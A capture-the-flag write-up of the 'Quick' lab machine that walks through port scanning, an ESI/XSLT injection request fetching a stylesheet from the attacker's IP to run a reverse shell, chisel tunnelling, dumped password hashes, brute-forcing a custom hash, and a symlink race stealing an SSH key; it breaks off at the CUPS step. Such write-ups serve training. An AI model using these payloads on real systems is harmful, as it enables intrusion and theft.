$ nmap -p- --min-rate 5000 10.129.85.76
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 02:28 EDT
Nmap scan report for 10.129.85.76
Host is up (0.0072s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
9001/tcp open tor-orport
JetSpeed
Port 9001 had a typical corporate website:
There was a link towards a new portal hosted on portal.quick.htb. However, it pointed to port 443 and I could not access that for now. Looking at the rest of the page, we can see other information like the clients they had:
There are also some testimonials from users:
We also can note that this is a PHP website as the page above is at clients.php. A quick directory search revealed the following:
Normally, the X-Powered-By header says Express or Flask or something similar, so this was new to me. Googling for exploits led to ESI injection:
Edge Side Include (ESI) injection is similar in syntax to XML injection: the gateway processes injected ESI tags server-side, which can let an attacker make requests on the gateway's behalf or, with some implementations, run code. This login page doesn't appear to be vulnerable, though, so let's keep it in mind for now.
Portal HTTP/3
The only lead left was the portal mentioned earlier. The website points us to port 443 over TCP, but that port is closed, so why would the site advertise a service we cannot reach? I read more about HTTPS and port 443 and found that it can also be served over UDP, as HTTP/3 (QUIC), instead of TCP.
A quick UDP scan shows port 443 as open|filtered, which is consistent with a QUIC listener (nmap cannot tell an open UDP port from a filtered one when it gets no reply).
$ sudo nmap -sU -p 443 --min-rate 10000 10.129.85.76
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 03:11 EDT
Nmap scan report for portal.quick.htb (10.129.85.76)
Host is up (0.0071s latency).
PORT STATE SERVICE
443/udp open|filtered https
To reach it we need a custom curl binary built with HTTP/3 (QUIC) support.
Afterwards, we can access the site using curl --http3. When we view the site, we see this:
<html>
<title> Quick | Customer Portal</title>
<h1>Quick | Portal</h1>
<head>
<style>
ul {
list-style-type: none;
margin: 0;
padding: 0;
width: 200px;
background-color: #f1f1f1;
}
li a {
display: block;
color: #000;
padding: 8px 16px;
text-decoration: none;
}
/* Change the link color on hover */
li a:hover {
background-color: #555;
color: white;
}
</style>
</head>
<body>
<p> Welcome to Quick User Portal</p>
<ul>
<li><a href="index.php">Home</a></li>
<li><a href="index.php?view=contact">Contact</a></li>
<li><a href="index.php?view=about">About</a></li>
<li><a href="index.php?view=docs">References</a></li>
</ul>
</html>
Afterwards, when viewing the PDFs, we find some credentials in the Connectivity one.
Cool! This also tells us that there might be a Docker container present. Now, we need to guess the email address. Earlier, we saw a bunch of testimonials with countries. I assumed that this was a hint to guess the email somehow.
Since there's a country, I assumed that it would end in something like .fr for France or something. Then, we can take the company name and construct a company email.
This command would download a reverse shell and execute it. Now we just need to append it to an existing ticket request, like this, to fetch and apply the XSL file we created:
POST /ticket.php HTTP/1.1
Host: 10.129.85.76:9001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
Origin: http://10.129.85.76:9001
Connection: close
Referer: http://10.129.85.76:9001/ticket.php
Cookie: PHPSESSID=nb64nmlnnesh3nc69h2s46l7uk
Upgrade-Insecure-Requests: 1

title=test&msg=test&id=TKT-1119;<esi:include src="http://localhost/" stylesheet="http://10.10.14.13/exe2.xsl"></esi:include>
This would download the XSL file we created. Afterwards, we need to create another one to run the file and execute commands via the same method.
The shell can be upgraded by dropping our public key into the SSH directory.
Printers
There was another user srvadm present on the machine:
sam@quick:/home$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Mar 20 2020 .
drwxr-xr-x 24 root root 4096 Dec 14 2021 ..
drwxr-xr-x 7 sam sam 4096 May 2 07:47 sam
drwxr-xr-x 6 srvadm srvadm 4096 Mar 20 2020 srvadm
It also appears there are other websites present on the machine:
sam@quick:/var/www$ ls -la
total 20
drwxr-xr-x 5 root root 4096 Dec 14 2021 .
drwxr-xr-x 14 root root 4096 Dec 14 2021 ..
drwxr-xr-x 2 root root 4096 Dec 14 2021 html
drwxrwxrwx 2 root root 4096 Dec 14 2021 jobs
drwxr-xr-x 6 root root 4096 Dec 14 2021 printer
We can find out who is running this website by reading the apache2 configuration files:
So there's another subdomain present. However, we cannot reach it from our machine, so we need some port forwarding. For some reason, forwarding port 80 does not let us visit the site, but forwarding port 9001 does.
# on kali
chisel server -p 5555 --reverse
# on victim
./chisel client 10.10.14.13:5555 R:9001:127.0.0.1:9001
Then we need to add printerv2.quick.htb to our hosts file pointing at 127.0.0.1. We can then visit it and see a login page.
SQL Credentials
Since we have access to the machine, let's try to find the credentials for this website. Within the db.php file in the /var/www/printer folder, we see this:
Now, we can access the SQL database and find the password hash for the printer service.
mysql> select * from users\g
+--------------+------------------+----------------------------------+
| name | email | password |
+--------------+------------------+----------------------------------+
| Elisa | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d |
| Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 |
+--------------+------------------+----------------------------------+
We get a hash, but CrackStation doesn't crack it for some reason, and john with rockyou.txt didn't find anything either. Since there's no easy password, let's look at the authentication mechanism instead.
<?php
include("db.php");
if(isset($_POST["email"]) && isset($_POST["password"])) {
    $email = $_POST["email"];
    $password = $_POST["password"];
    $password = md5(crypt($password, 'fa'));
    $stmt = $conn->prepare("select email,password from users where email=? and password=?");
    $stmt->bind_param("ss", $email, $password);
    $stmt->execute();
    $result = $stmt->get_result();
    $num_rows = $result->num_rows;
    if($num_rows > 0 && $email === "srvadm@quick.htb") {
        session_start();
        $_SESSION["loggedin"] = $email;
        header("location: home.php");
    }
<TRUNCATED>
So this first passes the password to crypt() with the fixed salt 'fa', then takes the MD5 of the result. We know both the cleartext and the hashed password of elisa, so we can reproduce this and check our reimplementation. The crypt() step explains why the hash won't crack normally: it is not the MD5 of the plaintext, but the MD5 of a crypt digest of it.
We can just create a quick PHP script that brute forces for us:
This does the same thing as index.php and compares each candidate's hash to the one from the database, so it finds the correct password. We can then log in to the service.
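To see why the stored hashes resist ordinary MD5 cracking, and what the portal should have done instead, here is the portal's scheme next to a hardened replacement. This is an added example, not code from the box or the writeup; the sample passwords are constructed.

```php
<?php
// Added example (not from the original writeup): the printer portal's
// hashing scheme, md5(crypt($password, 'fa')), beside a hardened form.

// Weak scheme as seen in index.php. crypt() with a two-character salt
// selects traditional DES crypt, which only looks at the first eight
// characters of the password, and the salt 'fa' is the same for every
// user, so two users with the same password get the same hash.
function quick_hash(string $password): string {
    return md5(crypt($password, 'fa'));
}

// Hardened replacement: bcrypt via password_hash(), which generates a
// random per-user salt and stores it inside the returned hash string.
function hardened_hash(string $password): string {
    return password_hash($password, PASSWORD_BCRYPT, ['cost' => 12]);
}

function hardened_verify(string $password, string $stored): bool {
    return password_verify($password, $stored);
}

// Constructed sample passwords that differ only after the eighth
// character: the weak scheme cannot tell them apart.
$a = 'password1';
$b = 'password2';
if (quick_hash($a) === quick_hash($b)) {
    echo "weak scheme: distinct passwords collide (DES crypt truncation)\n";
}

// bcrypt uses the whole password and a fresh salt on every call, so the
// second password is rejected and re-hashing gives a different string.
$h = hardened_hash($a);
if (hardened_verify($a, $h) && !hardened_verify($b, $h)) {
    echo "bcrypt: only the correct password verifies\n";
}
if (hardened_hash($a) !== $h) {
    echo "bcrypt: per-user random salt, no shared-hash leakage\n";
}
```

The fixed salt also means the whole users table can be attacked with one precomputed list, which is what a per-user salt prevents.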
Printing LFI
We can add printers and customise them to connect to other IP addresses:
We can also make them run jobs. We obviously need to add a printer pointing to our IP address, but what do we do with it? Let's analyse the job.php file to find out more:
It appears that a job is created and this writes a file into the /var/www/jobs folder. Afterwards, it sends a request to the printer (us) containing the contents of that file. This is another race condition: between the write and the read, we can replace the job file in /var/www/jobs with a symlink to another file, such as the id_rsa of the srvadm user.
Since this is a race, it's best to have a bash script looping in the /var/www/jobs folder, which is world-writable (drwxrwxrwx above), so we conveniently have write access to it.
Worked! Now we can use this private key to gain access to srvadm.
srvadm@quick:~$ id
uid=1001(srvadm) gid=1001(srvadm) groups=1001(srvadm),999(printers)
Root Creds
We are part of the printers group, which might have unique permissions. Googling about this group leads to CUPS, the common printing system on Linux distributions (Arch among them). We can use locate to find all files related to cups.